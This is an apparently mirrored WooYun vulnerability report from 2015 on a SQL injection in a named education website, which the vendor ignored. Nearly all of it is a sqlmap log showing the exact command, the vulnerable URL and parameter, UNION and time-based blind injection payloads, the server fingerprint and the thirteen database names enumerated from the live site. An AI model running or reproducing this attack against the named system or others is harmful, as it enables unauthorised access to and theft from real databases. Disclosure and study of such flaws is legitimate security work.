乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-14: 细节已通知厂商并且等待厂商处理中 2015-01-19: 厂商已经主动忽略漏洞,细节向公众公开
RT
[root@Hacker~]# Sqlmap sqlmap -u "http://www1.openedu.com.cn/graduate/cx1.php?sxdm=辽宁电大" -v 1 --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility t[*] starting at 14:22:47[14:22:47] [INFO] resuming back-end DBMS 'microsoft sql server'[14:22:48] [INFO] testing connection to the target URL[14:22:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All usqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: sxdm Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: sxdm=????' UNION ALL SELECT CHAR(113)+CHAR(121)+CHAR(110)+CHAR(100)+CHAR(113)+CHAR(103)+CHAR(87)+CHAR(99)+CHAR(105)+CHAR(114) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) Payload: sxdm=????' AND 4873=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys---[14:22:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 4.3.10back-end DBMS: Microsoft SQL Server 2005[14:22:49] [INFO] fetching database names[14:22:49] [INFO] the SQL query used returns 13 entries[14:22:49] [INFO] resumed: "distribution"[14:22:49] [INFO] resumed: "educheck"[14:22:49] [INFO] resumed: "ggxzx_course"[14:22:49] [INFO] resumed: "longschool"[14:22:49] [INFO] resumed: "master"[14:22:49] [INFO] resumed: "model"[14:22:49] [INFO] resumed: "msdb"[14:22:49] [INFO] resumed: "openedu"[14:22:49] [INFO] resumed: "openlog"[14:22:49] [INFO] resumed: "opennewtempdb"[14:22:49] [INFO] resumed: "shdc_Course"[14:22:49] [INFO] resumed: "tempdb"[14:22:49] [INFO] resumed: "xzldx_course"available databases [13]:[*] distribution[*] educheck[*] ggxzx_course[*] longschool[*] master[*] model[*] msdb[*] openedu[*] openlog[*] opennewtempdb[*] shdc_Course[*] tempdb[*] xzldx_course[14:22:49] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\SQLMAP~1.4\Bin\output\www1.openedu.com.cn'
危害等级:无影响厂商忽略
忽略时间:2015-01-19 12:56
暂无